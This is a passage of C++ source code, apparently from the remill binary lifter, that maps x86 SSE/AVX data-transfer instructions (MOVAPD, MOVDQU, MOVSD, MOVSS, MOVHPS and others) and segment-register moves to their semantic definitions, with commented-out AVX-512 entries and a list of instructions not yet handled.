//5592 VMOVAPD VMOVAPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5593 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5594 VMOVAPD VMOVAPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
//5595 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5596 VMOVAPD VMOVAPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTPD_MEMdq_XMMpd) = MOVxPD<MV128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVNTPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
# if HAS_FEATURE_AVX512
//6088 VMOVNTPD VMOVNTPD_MEMf64_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6089 VMOVNTPD VMOVNTPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//6090 VMOVNTPD VMOVNTPD_MEMf64_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVUPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>;
DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F10) = MOVxPD<V128W, V128>;
DEF_ISEL(MOVUPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>;
DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F11) = MOVxPD<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVUPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>;
DEF_ISEL(VMOVUPD_XMMdq_XMMdq_10) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVUPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>;
DEF_ISEL(VMOVUPD_XMMdq_XMMdq_11) = MOVxPD<VV128W, VV128>;
DEF_ISEL(VMOVUPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>;
DEF_ISEL(VMOVUPD_YMMqq_YMMqq_10) = MOVxPD<VV256W, VV256>;
DEF_ISEL(VMOVUPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>;
DEF_ISEL(VMOVUPD_YMMqq_YMMqq_11) = MOVxPD<VV256W, VV256>;
# if HAS_FEATURE_AVX512
//4991 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4992 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4993 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
//4994 VMOVUPD VMOVUPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4995 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4996 VMOVUPD VMOVUPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4997 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4998 VMOVUPD VMOVUPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4999 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5000 VMOVUPD VMOVUPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//5001 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5002 VMOVUPD VMOVUPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVNTDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQU_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>;
DEF_ISEL(MOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(VMOVNTDQ_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
//5061 VMOVNTDQ VMOVNTDQ_MEMu32_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//5062 VMOVNTDQ VMOVNTDQ_MEMu32_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//5063 VMOVNTDQ VMOVNTDQ_MEMu32_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
DEF_ISEL(VMOVNTDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVNTDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
//4142 VMOVNTDQA VMOVNTDQA_ZMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//4143 VMOVNTDQA VMOVNTDQA_XMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//4144 VMOVNTDQA VMOVNTDQA_YMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
DEF_ISEL(VMOVDQU_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVDQU_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>;
DEF_ISEL(VMOVDQU_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQU_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
DEF_ISEL(VMOVDQU_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>;
DEF_ISEL(VMOVDQU_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
DEF_ISEL(VMOVDQU_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>;
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>;
DEF_ISEL(MOVDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVDQA_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>;
DEF_ISEL(VMOVDQA_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
DEF_ISEL(VMOVDQA_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>;
DEF_ISEL(VMOVDQA_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
DEF_ISEL(VMOVDQA_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>;
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVLPS_MEMq_XMMps) = MOVLPS<MV64W, V128>;
DEF_ISEL(MOVLPS_XMMq_MEMq) = MOVLPS<V128W, MV64>;
IF_AVX(DEF_ISEL(VMOVLPS_MEMq_XMMq) = MOVLPS<MV64W, VV128>;)
IF_AVX(DEF_ISEL(VMOVLPS_XMMdq_XMMdq_MEMq) = VMOVLPS;)
DEF_ISEL(MOVHLPS_XMMq_XMMq) = MOVHLPS;
IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMq_XMMq) = VMOVHLPS;)
IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMdq_XMMdq) = VMOVHLPS;)
DEF_ISEL(MOVLHPS_XMMq_XMMq) = MOVLHPS;
IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMq_XMMq) = VMOVLHPS;)
IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMdq_XMMdq) = VMOVLHPS;)
#if HAS_FEATURE_AVX
# if HAS_FEATURE_AVX512
//4606 VMOVLPS VMOVLPS_XMMf32_XMMf32_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
//4607 VMOVLPS VMOVLPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVLPD_XMMsd_MEMq) = MOVLPD<V128W, MV64>;
DEF_ISEL(MOVLPD_MEMq_XMMsd) = MOVLPD<MV64W, V128>;
IF_AVX(DEF_ISEL(VMOVLPD_MEMq_XMMq) = MOVLPD<MV64W, VV128>;)
IF_AVX(DEF_ISEL(VMOVLPD_XMMdq_XMMdq_MEMq) = VMOVLPD;)
#if HAS_FEATURE_AVX
# if HAS_FEATURE_AVX512
//4599 VMOVLPD VMOVLPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
//4600 VMOVLPD VMOVLPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
namespace {
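// MOVSD (the SSE2 scalar double move) has two behaviors, modeled by separate
// semantics below: the memory forms (`MOVSD_MEM`) transfer exactly one 64-bit
// lane (architecturally, the load flavor zeroes bits 127:64 of the XMM
// destination), while the register-to-register form (`MOVSD`) merges the low
// qword of the source into the destination and preserves bits 127:64.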
template <typename D, typename S>
DEF_SEM(MOVSD_MEM, D dst, S src) {
FWriteV64(dst, FExtractV64(FReadV64(src), 0));
return memory;
}
DEF_SEM(MOVSD, V128W dst, V128 src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
// Register-to-register form: dst[63:0] = src2[63:0] and
// dst[127:64] = src1[127:64]; the merge behavior mirrors `VMOVLPD`.
DEF_SEM(VMOVSD, VV128W dst, V128 src1, V128 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src2), 1, FExtractV64(FReadV64(src1), 1)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F10) = MOVSD;
DEF_ISEL(MOVSD_XMM_XMMdq_MEMsd) = MOVSD_MEM<V128W, MV64>;
DEF_ISEL(MOVSD_XMM_MEMsd_XMMsd) = MOVSD_MEM<MV64W, V128>;
DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F11) = MOVSD;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVSD_XMMdq_MEMq) = MOVSD_MEM<VV128W, MV64>;
DEF_ISEL(VMOVSD_MEMq_XMMq) = MOVSD_MEM<MV64W, VV128>;
DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_10) = VMOVSD;
DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_11) = VMOVSD;
# if HAS_FEATURE_AVX512
//3632 VMOVSD VMOVSD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3633 VMOVSD VMOVSD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3634 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
//3635 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTSD_MEMq_XMMq) = MOVSD_MEM<MV64W, V128>;
namespace {
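// MOVSS mirrors MOVSD for 32-bit lanes: the memory forms move a single f32
// (architecturally, the load zeroes bits 127:32 of the destination), and the
// register form merges into lane 0 while preserving the upper lanes.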
template <typename D, typename S>
DEF_SEM(MOVSS_MEM, D dst, S src) {
FWriteV32(dst, FExtractV32(FReadV32(src), 0));
return memory;
}
DEF_SEM(MOVSS, V128W dst, V128 src) {
FWriteV32(dst, FInsertV32(FReadV32(dst), 0, FExtractV32(FReadV32(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVSS, VV128W dst, V128 src1, V128 src2) {
FWriteV32(dst, FInsertV32(FReadV32(src1), 0, FExtractV32(FReadV32(src2), 0)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVSS_XMMdq_MEMss) = MOVSS_MEM<V128W, MV32>;
DEF_ISEL(MOVSS_MEMss_XMMss) = MOVSS_MEM<MV32W, V128>;
DEF_ISEL(MOVSS_XMMss_XMMss_0F10) = MOVSS;
DEF_ISEL(MOVSS_XMMss_XMMss_0F11) = MOVSS;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVSS_XMMdq_MEMd) = MOVSS_MEM<VV128W, MV32>;
DEF_ISEL(VMOVSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_10) = VMOVSS;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_11) = VMOVSS;
# if HAS_FEATURE_AVX512
//3650 VMOVSS VMOVSS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3651 VMOVSS VMOVSS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3652 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
//3653 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;
namespace {
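// MOVHPD merges a 64-bit memory operand into the high qword of the
// destination, preserving the low qword; MOVHPD_STORE writes the high qword
// of the source register out to memory.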
DEF_SEM(MOVHPD, V128W dst, MV64 src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 1, FExtractV64(FReadV64(src), 0)));
return memory;
}
DEF_SEM(MOVHPD_STORE, MV64W dst, V128 src) {
FWriteV64(dst, FExtractV64(FReadV64(src), 1));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVHPD, VV256W dst, V128 src1, MV64 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src1), 1, FExtractV64(FReadV64(src2), 0)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVHPD_XMMsd_MEMq) = MOVHPD;
DEF_ISEL(MOVHPD_MEMq_XMMsd) = MOVHPD_STORE;
IF_AVX(DEF_ISEL(VMOVHPD_XMMdq_XMMq_MEMq) = VMOVHPD;)
IF_AVX(DEF_ISEL(VMOVHPD_MEMq_XMMdq) = MOVHPD_STORE;)
//5181 VMOVHPD VMOVHPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
//5182 VMOVHPD VMOVHPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
namespace {
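// MOVHPS moves two packed single-precision floats between a 64-bit memory
// operand and the high half (lanes 2 and 3) of an XMM register; on loads,
// the low half of the destination is left intact.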
DEF_SEM(MOVHPS, V128W dst, MV64 src) {
auto dst_vec = FReadV32(dst);
auto src_vec = FReadV32(src);
auto low_entry = FExtractV32(src_vec, 0);
auto high_entry = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
return memory;
}
DEF_SEM(MOVHPS_STORE, MV64W dst, V128 src) {
auto dst_vec = FClearV32(FReadV32(dst));
auto src_vec = FReadV32(src);
auto low_entry = FExtractV32(src_vec, 2);
auto high_entry = FExtractV32(src_vec, 3);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 0, low_entry), 1, high_entry));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVHPS, VV256W dst, V128 src1, MV64 src2) {
auto dst_vec = FReadV32(src1);
auto src_vec = FReadV32(src2);
auto low_entry = FExtractV32(src_vec, 0);
auto high_entry = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVHPS_XMMq_MEMq) = MOVHPS;
DEF_ISEL(MOVHPS_MEMq_XMMps) = MOVHPS_STORE;
IF_AVX(DEF_ISEL(VMOVHPS_XMMdq_XMMq_MEMq) = VMOVHPS;)
IF_AVX(DEF_ISEL(VMOVHPS_MEMq_XMMdq) = MOVHPS_STORE;)
//5197 VMOVHPS VMOVHPS_XMMf32_XMMf32_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
//5198 VMOVHPS VMOVHPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
namespace {
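// Writes to segment registers are modeled as a plain register write followed
// by a synchronous hypercall: remill does not model descriptor tables itself,
// so the embedding runtime is expected to react to the SyncHyperCall (e.g. by
// recomputing the segment base and related hidden state).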
template <typename T>
DEF_SEM(MOV_ES, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentES);
}
template <typename T>
DEF_SEM(MOV_SS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentSS);
}
template <typename T>
DEF_SEM(MOV_DS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentDS);
}
template <typename T>
DEF_SEM(MOV_FS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentFS);
}
template <typename T>
DEF_SEM(MOV_GS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentGS);
}
} // namespace
DEF_ISEL(MOV_MEMw_SEG) = MOV<M16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_16) = MOV<R16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_32) = MOV<R32W, R16>;
IF_64BIT(DEF_ISEL(MOV_GPRv_SEG_64) = MOV<R64W, R16>;)
DEF_ISEL(MOV_SEG_MEMw_ES) = MOV_ES<M16>;
DEF_ISEL(MOV_SEG_MEMw_SS) = MOV_SS<M16>;
DEF_ISEL(MOV_SEG_MEMw_DS) = MOV_DS<M16>;
DEF_ISEL(MOV_SEG_MEMw_FS) = MOV_FS<M16>;
DEF_ISEL(MOV_SEG_MEMw_GS) = MOV_GS<M16>;
DEF_ISEL(MOV_SEG_GPR16_ES) = MOV_ES<R16>;
DEF_ISEL(MOV_SEG_GPR16_SS) = MOV_SS<R16>;
DEF_ISEL(MOV_SEG_GPR16_DS) = MOV_DS<R16>;
DEF_ISEL(MOV_SEG_GPR16_FS) = MOV_FS<R16>;
DEF_ISEL(MOV_SEG_GPR16_GS) = MOV_GS<R16>;
/*
25 MOV_DR MOV_DR_DR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
26 MOV_DR MOV_DR_DR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
27 MOV_DR MOV_DR_GPR32_DR DATAXFER BASE I86 ATTRIBUTES: RING0
28 MOV_DR MOV_DR_GPR64_DR DATAXFER BASE I86 ATTRIBUTES: RING0
1312 MASKMOVDQU MASKMOVDQU_XMMdq_XMMdq DATAXFER SSE2 SSE2 ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX
545 MOVMSKPS MOVMSKPS_GPR32_XMMps DATAXFER SSE SSE ATTRIBUTES:
585 MOVSHDUP MOVSHDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
586 MOVSHDUP MOVSHDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
647 MOVLHPS MOVLHPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES:
648 MOVQ2DQ MOVQ2DQ_XMMdq_MMXq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX
689 MOV_CR MOV_CR_CR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
690 MOV_CR MOV_CR_CR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
691 MOV_CR MOV_CR_GPR32_CR DATAXFER BASE I86 ATTRIBUTES: RING0
692 MOV_CR MOV_CR_GPR64_CR DATAXFER BASE I86 ATTRIBUTES: RING0
957 MOVSLDUP MOVSLDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
958 MOVSLDUP MOVSLDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
1071 MOVBE MOVBE_GPRv_MEMv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1072 MOVBE MOVBE_MEMv_GPRv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1484 MOVDQ2Q MOVDQ2Q_MMXq_XMMq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX
1495 MOVMSKPD MOVMSKPD_GPR32_XMMpd DATAXFER SSE2 SSE2 ATTRIBUTES:
1829 MASKMOVQ MASKMOVQ_MMXq_MMXq DATAXFER MMX PENTIUMMMX ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX
1839 MOVHLPS MOVHLPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES:
1880 MOVDDUP MOVDDUP_XMMdq_MEMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED
1881 MOVDDUP MOVDDUP_XMMdq_XMMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED
1882 BSWAP BSWAP_GPRv DATAXFER BASE I486REAL ATTRIBUTES: SCALABLE
2101 VMOVMSKPD VMOVMSKPD_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2102 VMOVMSKPD VMOVMSKPD_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2107 VMOVMSKPS VMOVMSKPS_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2108 VMOVMSKPS VMOVMSKPS_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2202 VMOVSHDUP VMOVSHDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES:
2203 VMOVSHDUP VMOVSHDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2204 VMOVSHDUP VMOVSHDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2205 VMOVSHDUP VMOVSHDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2281 VMOVDDUP VMOVDDUP_XMMdq_MEMq DATAXFER AVX AVX ATTRIBUTES:
2282 VMOVDDUP VMOVDDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2283 VMOVDDUP VMOVDDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2284 VMOVDDUP VMOVDDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2464 VMOVSLDUP VMOVSLDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES:
2465 VMOVSLDUP VMOVSLDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2466 VMOVSLDUP VMOVSLDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2467 VMOVSLDUP VMOVSLDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2619 VMOVLHPS VMOVLHPS_XMMdq_XMMq_XMMq DATAXFER AVX AVX ATTRIBUTES:
3395 VMOVHLPS VMOVHLPS_XMMdq_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
3804 VPMOVDB VPMOVDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3805 VPMOVDB VPMOVDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3806 VPMOVDB VPMOVDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3807 VPMOVDB VPMOVDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3808 VPMOVDB VPMOVDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
